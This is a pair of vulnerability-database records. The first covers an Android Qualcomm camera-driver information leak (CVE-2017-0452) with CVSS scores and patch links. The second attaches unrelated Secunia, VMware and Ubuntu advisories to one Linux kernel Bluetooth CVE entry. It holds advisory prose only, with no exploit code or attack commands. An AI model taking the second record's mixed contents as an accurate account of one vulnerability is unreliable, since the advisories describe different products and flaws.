            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.7,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0452",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0452",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-03639",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201703-285",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0452",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0452"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0452"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-285"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An information disclosure vulnerability in the Qualcomm camera driver could enable a local malicious application to access data outside of its permission levels. This issue is rated as Low because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10. Android ID: A-32873615. References: QC-CR#1093693. GoogleNexus is a high-end mobile phone series powered by Google\\342\\200\\231s original Android system. An attacker could exploit this vulnerability to obtain potentially sensitive information. Google Nexus is prone to an information-disclosure vulnerability. Information obtained may aid in further attacks",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0452"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      },
      {
        "db": "BID",
        "id": "96836"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0452"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0452",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96836",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1037968",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002057",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-03639",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-285",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0452",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0452"
      },
      {
        "db": "BID",
        "id": "96836"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0452"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-285"
      }
    ]
  },
  "id": "VAR-201703-0685",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      }
    ]
  },
  "last_update_date": "2023-12-18T10:51:35.200000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-March 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-03-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GoogleNexusQualcommCameraDriver Information Disclosure Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/91016"
      },
      {
        "title": "Android Qualcomm camera Fixes for driver information disclosure vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67880"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014March 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=65d776aaa82a91341631d2aa61736067"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0452"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-285"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0452"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-03-01.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/96836"
      },
      {
        "trust": 1.4,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0452"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1037968"
      },
      {
        "trust": 1.1,
        "url": "https://source.android.com/security/bulletin/2017-03-01"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0452"
      },
      {
        "trust": 0.3,
        "url": "http://www.android.com/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0452"
      },
      {
        "db": "BID",
        "id": "96836"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0452"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-285"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0452"
      },
      {
        "db": "BID",
        "id": "96836"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0452"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-285"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-03-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      },
      {
        "date": "2017-03-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0452"
      },
      {
        "date": "2017-03-06T00:00:00",
        "db": "BID",
        "id": "96836"
      },
      {
        "date": "2017-03-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      },
      {
        "date": "2017-03-08T01:59:00.673000",
        "db": "NVD",
        "id": "CVE-2017-0452"
      },
      {
        "date": "2017-03-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201703-285"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-03-29T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-03639"
      },
      {
        "date": "2017-07-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0452"
      },
      {
        "date": "2017-03-16T01:01:00",
        "db": "BID",
        "id": "96836"
      },
      {
        "date": "2017-03-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      },
      {
        "date": "2017-07-17T13:18:11.767000",
        "db": "NVD",
        "id": "CVE-2017-0452"
      },
      {
        "date": "2017-03-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201703-285"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-285"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Information disclosure vulnerability in camera drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-002057"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-285"
      }
    ],
    "trust": 0.6
  }
}

var-201206-0026
Vulnerability from variot

The sco_sock_getsockopt_old function in net/bluetooth/sco.c in the Linux kernel before 2.6.39 does not initialize a certain structure, which allows local users to obtain potentially sensitive information from kernel stack memory via the SCO_CONNINFO option. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following products are affected: JP1/IT Resource Management - Manager JP1/IT Service Level Management - Manager. ----------------------------------------------------------------------

Secunia is hiring!

Find your next job here:

http://secunia.com/company/jobs/


TITLE: Hitachi JP1/IT Service Level Management Unspecified Cross-Site Scripting Vulnerability

SECUNIA ADVISORY ID: SA47804

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47804/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47804

RELEASE DATE: 2012-01-31

DISCUSS ADVISORY: http://secunia.com/advisories/47804/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)

http://secunia.com/advisories/47804/

ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS

https://ca.secunia.com/?page=viewadvisory&vuln_id=47804

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING

http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: A vulnerability has been reported in Hitachi JP1/IT Service Level Management, which can be exploited by malicious people to conduct cross-site scripting attacks.

Certain unspecified input is not properly sanitised before being returned to the user.

The vulnerability is reported in version 09-50.

SOLUTION: Update to version 09-51.

PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.

ORIGINAL ADVISORY: Hitachi (English): http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-005/index.html

Hitachi (Japanese): http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-005/index.html

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2012-0001 Synopsis: VMware ESXi and ESX updates to third party library and ESX Service Console Issue date: 2012-01-30 Updated on: 2012-01-30 (initial advisory)

CVE numbers: --- COS Kernel --- CVE-2011-0726, CVE-2011-1078, CVE-2011-1079, CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166, CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494, CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649, CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182, CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745, CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022, CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525, CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495, CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 --- COS cURL --- CVE-2011-2192 --- COS rpm --- CVE-2010-2059, CVE-2011-3378 --- COS samba --- CVE-2010-0547, CVE-2010-0787, CVE-2011-1678, CVE-2011-2522, CVE-2011-2694 --- COS python --- CVE-2009-3720, CVE-2010-3493, CVE-2011-1015, CVE-2011-1521 --- python library --- CVE-2009-3560, CVE-2009-3720, CVE-2010-1634, CVE-2010-2089, CVE-2011-1521


  1. Summary

VMware ESXi and ESX updates to third party library and ESX Service Console address several security issues.

  1. Relevant releases

ESXi 4.1 without patch ESXi410-201201401-SG

ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG, ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG, ESX410-201201407-SG

  1. Problem Description

a. ESX third party update for Service Console kernel

The ESX Service Console Operating System (COS) kernel is updated to
kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the
COS kernel.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201401-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

b. ESX third party update for Service Console cURL RPM

The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9
resolving a security issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201402-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

c. ESX third party update for Service Console nspr and nss RPMs

The ESX Service Console (COS) nspr and nss RPMs are updated to
nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving
a security issues.

A Certificate Authority (CA) issued fraudulent SSL certificates and
Netscape Portable Runtime (NSPR) and Network Security Services (NSS)
contain the built-in tokens of this fraudulent Certificate
Authority. This update renders all SSL certificates signed by the
fraudulent CA as untrusted for all uses.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201404-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

d. ESX third party update for Service Console rpm RPMs

The ESX Service Console Operating System (COS) rpm packages are
updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,
rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2
which fixes multiple security issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201406-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

e. ESX third party update for Service Console samba RPMs

The ESX Service Console Operating System (COS) samba packages are
updated to samba-client-3.0.33-3.29.el5_7.4,
samba-common-3.0.33-3.29.el5_7.4 and
libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security
issues in the Samba client.

Note that ESX does not include the Samba Web Administration Tool
(SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and
CVE-2011-2694.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201407-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

f. ESX third party update for Service Console python package

The ESX Service Console (COS) python package is updated to
2.4.3-44 which fixes multiple security issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201405-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

g. ESXi update to third party component python

The python third party library is updated to python 2.5.6 which
fixes multiple security issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           5.0       ESXi     patch pending
ESXi           4.1       ESXi     ESXi410-201201401-SG
ESXi           4.0       ESXi     patch pending
ESXi           3.5       ESXi     patch pending

ESX            4.1       ESX      not affected
ESX            4.0       ESX      not affected
ESX            3.5       ESX      not affected

* hosted products are VMware Workstation, Player, ACE, Fusion.
  1. Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

VMware ESXi 4.1


ESXi410-201201401 http://downloads.vmware.com/go/selfsupport-download md5sum: BDF86F10A973346E26C9C2CD4C424E88
sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F http://kb.vmware.com/kb/2009143 ESXi410-201201401 contains ESXi410-201201401-SG

VMware ESX 4.1


ESX410-201201001 http://downloads.vmware.com/go/selfsupport-download md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F
sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC http://kb.vmware.com/kb/2009142

ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG, ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and ESX410-201201407-SG

  1. References

CVE numbers

--- COS Kernel --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901 --- COS cURL --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192 --- COS rpm --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378 --- COS samba --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694 --- COS python --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521 --- python library --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521


  1. Change log

2012-01-30 VMSA-2012-0001 Initial security advisory in conjunction with the release of patches for ESX 4.1 and ESXi 4.1 on 2012-01-30.


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories http://www.vmware.com/security/advisories

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2012 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8

wj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8 f2pLxi537s+ew4dvnYNWlJ8= =OAh4 -----END PGP SIGNATURE----- . ========================================================================== Ubuntu Security Notice USN-1256-1 November 09, 2011

linux-lts-backport-natty vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 10.04 LTS

Summary:

Several security issues were fixed in the kernel.

Software Description: - linux-lts-backport-natty: Linux kernel backport from Natty

Details:

It was discovered that the /proc filesystem did not correctly handle permission changes when programs executed. A local attacker could hold open files to examine details about programs running with higher privileges, potentially increasing the chances of exploiting additional vulnerabilities. (CVE-2011-1020)

Vasiliy Kulikov discovered that the Bluetooth stack did not correctly clear memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2011-1078)

Vasiliy Kulikov discovered that the Bluetooth stack did not correctly check that device name strings were NULL terminated. A local attacker could exploit this to crash the system, leading to a denial of service, or leak contents of kernel stack memory, leading to a loss of privacy. (CVE-2011-1079)

Vasiliy Kulikov discovered that bridge network filtering did not check that name fields were NULL terminated. A local attacker could exploit this to leak contents of kernel stack memory, leading to a loss of privacy. (CVE-2011-1080)

Johan Hovold discovered that the DCCP network stack did not correctly handle certain packet combinations. A remote attacker could send specially crafted network traffic that would crash the system, leading to a denial of service. (CVE-2011-1093)

Peter Huewe discovered that the TPM device did not correctly initialize memory. A local attacker could exploit this to read kernel heap memory contents, leading to a loss of privacy. (CVE-2011-1160)

Dan Rosenberg discovered that the IRDA subsystem did not correctly check certain field sizes. If a system was using IRDA, a remote attacker could send specially crafted traffic to crash the system or gain root privileges. (CVE-2011-1180)

Ryan Sweat discovered that the GRO code did not correctly validate memory. In some configurations on systems using VLANs, a remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2011-1478)

It was discovered that the security fix for CVE-2010-4250 introduced a regression. A remote attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-1479)

Dan Rosenberg discovered that the X.25 Rose network stack did not correctly handle certain fields. If a system was running with Rose enabled, a remote attacker could send specially crafted traffic to gain root privileges. (CVE-2011-1493)

It was discovered that the Stream Control Transmission Protocol (SCTP) implementation incorrectly calculated lengths. If the net.sctp.addip_enable variable was turned on, a remote attacker could send specially crafted traffic to crash the system. (CVE-2011-1573)

Ryan Sweat discovered that the kernel incorrectly handled certain VLAN packets. On some systems, a remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2011-1576)

Timo Warns discovered that the GUID partition parsing routines did not correctly validate certain structures. A local attacker with physical access could plug in a specially crafted block device to crash the system, leading to a denial of service. (CVE-2011-1577)

Phil Oester discovered that the network bonding system did not correctly handle large queues. On some systems, a remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2011-1581)

